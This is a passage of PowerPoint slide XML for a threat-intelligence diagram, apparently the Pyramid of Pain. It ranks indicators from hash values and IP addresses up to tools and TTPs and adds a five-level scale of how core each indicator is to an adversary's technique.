            <a:ext cx="3663484" cy="809921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 438741 w 3663484"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX1" fmla="*/ 3224743 w 3663484"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX2" fmla="*/ 3663484 w 3663484"/>
              <a:gd name="connsiteY2" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3663484"/>
              <a:gd name="connsiteY3" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX4" fmla="*/ 438741 w 3663484"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8099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63484" h="809921">
                <a:moveTo>
                  <a:pt x="438741" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3224743" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3663484" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438741" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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N"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform: Shape 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72EF2D8A-43C1-1BE8-88A0-D602C375BF0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674011" y="4737055"/>
            <a:ext cx="4590498" cy="809921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 438741 w 4590498"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX1" fmla="*/ 4151757 w 4590498"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 809921"/>
              <a:gd name="connsiteX2" fmla="*/ 4590498 w 4590498"/>
              <a:gd name="connsiteY2" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4590498"/>
              <a:gd name="connsiteY3" fmla="*/ 809921 h 809921"/>
              <a:gd name="connsiteX4" fmla="*/ 438741 w 4590498"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8099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90498" h="809921">
                <a:moveTo>
                  <a:pt x="438741" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4151757" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4590498" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="809921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438741" y="0"/>
                </a:ln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N"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Freeform: Shape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A6D363-AA15-3D64-BC7C-01A08D44C5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198120" y="5592695"/>
            <a:ext cx="5542280" cy="832782"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 451125 w 5542280"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 832782"/>
              <a:gd name="connsiteX1" fmla="*/ 5091155 w 5542280"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 832782"/>
              <a:gd name="connsiteX2" fmla="*/ 5542280 w 5542280"/>
              <a:gd name="connsiteY2" fmla="*/ 832782 h 832782"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5542280"/>
              <a:gd name="connsiteY3" fmla="*/ 832782 h 832782"/>
              <a:gd name="connsiteX4" fmla="*/ 451125 w 5542280"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8327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42280" h="832782">
                <a:moveTo>
                  <a:pt x="451125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5091155" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5542280" y="832782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="832782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451125" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3E575A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N"/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F5861268-B290-691D-A7E5-F0436DF1C936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635620" y="1693910"/>
            <a:ext cx="6943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TTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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E78728FD-CFF8-054B-326A-212FB6CAAF65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528040" y="2390429"/>
            <a:ext cx="8907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TOOLS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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A3E6C39F-B49D-3B17-7F1A-7347C8EA6672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2173096" y="3105834"/>
            <a:ext cx="16193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Network/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Host Artifacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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5FE082D9-FD45-838C-E81C-A8CE72D562F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074608" y="4101709"/>
            <a:ext cx="17893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Domain Names</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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AE1DF18C-2779-3770-8680-885FFF321344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2203206" y="4957349"/>
            <a:ext cx="15321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IP Addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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2CF1D8E6-D400-761C-761B-677F3AED2FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2245197" y="5824420"/>
            <a:ext cx="14751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Hash Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Rectangle 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB2FD80-999A-7D71-09EF-D07EBB0D3BAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290732" y="1531319"/>
            <a:ext cx="2330753" cy="1448737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/>
              <a:t>Behaviors demonstrated by an adversary</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Rectangle 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0867D96-F445-147A-CDA5-E3297EBD1B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285189" y="3111327"/>
            <a:ext cx="2330752" cy="1448737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/>
              <a:t>Tools used by adversaries during an attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Rectangle 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C755F70-81D1-03E6-7C2E-BB6F9A11C211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285189" y="4691335"/>
            <a:ext cx="2330752" cy="1448737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/>
              <a:t>Ephemeral values which are easy for an adversary to change</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Freeform: Shape 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6C05C4-8E0E-FA22-BBFC-D20C8FB36F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946803" y="1464733"/>
            <a:ext cx="2047077" cy="893921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX1" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX2" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY2" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY3" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8939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47077" h="893921">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2047077" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047077" y="893921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="893921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sz="1600" dirty="0"/>
              <a:t>Core to sub technique (5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Freeform: Shape 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912AEE77-C2BB-7567-F8C9-FB6D9F6A074F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946803" y="2404373"/>
            <a:ext cx="2047077" cy="893921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX1" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX2" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY2" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY3" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8939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47077" h="893921">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2047077" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047077" y="893921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="893921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sz="1600" dirty="0"/>
              <a:t>Core to implementation of sub technique (4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Freeform: Shape 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5221D02C-5E1A-1DF1-3FD6-DD7FE0959486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946803" y="3344013"/>
            <a:ext cx="2047077" cy="893921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX1" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX2" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY2" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY3" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8939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47077" h="893921">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2047077" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047077" y="893921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="893921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sz="1600" dirty="0"/>
              <a:t>Core to Pre-Existing Tool (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Freeform: Shape 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B522A84F-67A2-D2B6-00B9-F4CFB3609AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946803" y="4283653"/>
            <a:ext cx="2047077" cy="893921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX1" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 893921"/>
              <a:gd name="connsiteX2" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY2" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY3" fmla="*/ 893921 h 893921"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 8939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47077" h="893921">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2047077" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047077" y="893921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="893921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sz="1600" dirty="0"/>
              <a:t>Core to adversary-brought Tool (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Freeform: Shape 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E1CE42-E77D-F4E3-97F5-037FCB0469EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946803" y="5223293"/>
            <a:ext cx="2047077" cy="916779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 916779"/>
              <a:gd name="connsiteX1" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 916779"/>
              <a:gd name="connsiteX2" fmla="*/ 2047077 w 2047077"/>
              <a:gd name="connsiteY2" fmla="*/ 916779 h 916779"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY3" fmla="*/ 916779 h 916779"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2047077"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 9167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47077" h="916779">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2047077" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2047077" y="916779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="916779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sz="1600" dirty="0"/>
              <a:t>Ephemeral (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="120" name="Straight Arrow Connector 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355D1AC0-24A9-AC5B-1C42-F08D16C28336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302000" y="1754870"/>
            <a:ext cx="2865120" cy="430506"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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2" name="Straight Arrow Connector 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEA47B75-6ACB-1B25-C6AF-FBCFA50CD125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3735313" y="2587850"/>
            <a:ext cx="2431807" cy="1085934"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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Arrow Connector 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C2482C-3FC5-3054-173E-A9D4279ECD1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4235798" y="3521140"/>
            <a:ext cx="2012602" cy="1436209"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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4" name="Straight Arrow Connector 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D894BE-4E28-6E39-BBC2-679E24A7D8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699304" y="4337030"/>
            <a:ext cx="1502295" cy="881400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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5" name="Straight Arrow Connector 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C34B94E-06AA-FFFE-8ECB-431358CD1F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019452" y="5139441"/>
            <a:ext cx="1147668" cy="300854"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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6" name="Straight Arrow Connector 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064BFD95-BE55-34BB-9AFD-BEF647964E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5434489" y="5674045"/>
            <a:ext cx="767110" cy="130258"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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8" name="Straight Arrow Connector 137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8CA539-3B03-C9F8-932B-ABAECEFDD4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8673420" y="2124416"/>
            <a:ext cx="1215904" cy="131576"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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0" name="Straight Arrow Connector 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F5C2A1-4164-545A-8E82-8873D181B8FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8673420" y="2404373"/>
            <a:ext cx="1192843" cy="355388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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3" name="Straight Arrow Connector 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42010A96-173D-4E75-7ED2-FB292CEB72C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8652730" y="4159336"/>
            <a:ext cx="1192843" cy="355388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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4" name="Straight Arrow Connector 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D287263-B96D-B90A-12F7-6D4B6D47F70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8652730" y="3966166"/>
            <a:ext cx="1215904" cy="131576"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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5" name="Straight Arrow Connector 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD6846E-538C-E0FD-CE3D-5FEF2340ECB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8673420" y="5593606"/>
            <a:ext cx="1215904" cy="40120"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB09905-B2F1-4B43-4A6F-77D885FEEB08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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9917097" y="6140072"/>
            <a:ext cx="1761829" cy="7281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9042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99FD07-994E-3821-B6AB-7B259C94B8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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB1EFE1-5D67-80ED-842D-36BB52CB756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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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8828A587-70CA-2DDB-0435-16CFBA6EB7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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
